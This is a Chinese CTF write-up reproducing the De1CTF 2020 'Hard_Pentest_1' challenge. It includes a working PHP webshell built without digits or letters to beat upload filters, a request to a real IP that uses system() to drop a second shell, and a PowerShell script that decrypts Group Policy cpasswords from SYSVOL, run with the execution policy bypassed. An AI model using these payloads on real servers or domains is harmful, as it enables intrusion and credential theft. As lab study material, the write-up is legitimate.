Hard_Pentest_1 复现

无数字字母的webshell

上传绕过,只需用短标签、P神的无数字字母的webshell绕过即可,上传文件名绕过因为是windows直接大小写绕过。

exp

<?= $_=[] ?> 
<?= $_=@"$_" ?>
<?= $_=$_[('!'=='@')] ?>

<?= $__ = $_ ?>
<?= @$____ = $__++ + $__++ + $__++ + $__++ + $__++ + $__++ ?>
<?= $_______ = "_".$__ ?>

<?= $__ = $_ ?>
<?= @$____ = $__++ + $__++ + $__++ + $__++ ?>
<?= $_______ .= $__ ?>

<?= $__ = $_ ?>
<?= @$____ = $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++  ?>
<?= $_______ .= $__  ?>

<?= ${$_______}["_"](${$_______}["__"]) ?>

写小马:

http://47.113.219.76/uploads/d8ffd2952b7416f6096c2481dfad4351/6539886cfe4730b929fa714a800aa44a_6.Php?_=system&__=echo "<?php phpinfo()?>">>1.php

域渗透

上传cmd.exe后执行net user看到提示在\\192.168.0.12\Hint

20200507032004

看到一个压缩包里面有flag1和flag2的提示。

20200507032131

SYSVOL还原组策略中保存的密码

参考3gstudent的-域渗透——利用SYSVOL还原组策略中保存的密码

在域中,存在一个默认的共享路径:

\\<DOMAIN>\SYSVOL\<DOMAIN>\

这里的域可以在ipconfig /all下看到:

20200507022504

直接访问如下地址

//De1CTF2020.lab/SYSVOL/De1CTF2020.lab/

20200507022747

找到对应的策略组id配置文件,如下的Group.xml

//De1CTF2020.lab/SYSVOL/De1CTF2020.lab/Policies/{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}/Machine/Preferences/Groups/

20200507023026

简单的来说就是:\SYSVOL路径中保存了域内用户的一些配置信息->找到HintZip_Pass用户的配置信息->然后找到AES256加密的密钥,由于微软已经公开了私钥,那么就可以把这个登录密钥还原出来->最后解出压缩包。下面的cpasswd就是加密的秘钥

20200507032239

解密脚本

function Get-DecryptedCpassword {
    [CmdletBinding()]
    Param (
        [string] $Cpassword 
    )

    try {
        #Append appropriate padding based on string length  
        $Mod = ($Cpassword.length % 4)

        switch ($Mod) {
        '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
        '2' {$Cpassword += ('=' * (4 - $Mod))}
        '3' {$Cpassword += ('=' * (4 - $Mod))}
        }


        $Base64Decoded = [Convert]::FromBase64String($Cpassword)

        #Create a new AES .NET Crypto Object
        $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
        [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                             0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

        #Set IV to all nulls to prevent dynamic generation of IV value
        $AesIV = New-Object Byte[]($AesObject.IV.Length) 
        $AesObject.IV = $AesIV
        $AesObject.Key = $AesKey
        $DecryptorObject = $AesObject.CreateDecryptor() 
        [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)

        return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
    } 

    catch {Write-Error $Error[0]}
}  
Get-DecryptedCpassword "uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08"

执行:

powershell -executionpolicy bypass -file 1.ps1

20200507032803

压缩包的密码是:zL1PpP@sSwO3d

得到flag:

20200507032939

本文总阅读量
× 文章目录
  1. 1. 无数字字母的webshell
    1. 1.1. exp
    2. 1.2. 写小马:
  2. 2. 域渗透
    1. 2.1. SYSVOL还原组策略中保存的密码
    2. 2.2. 解密脚本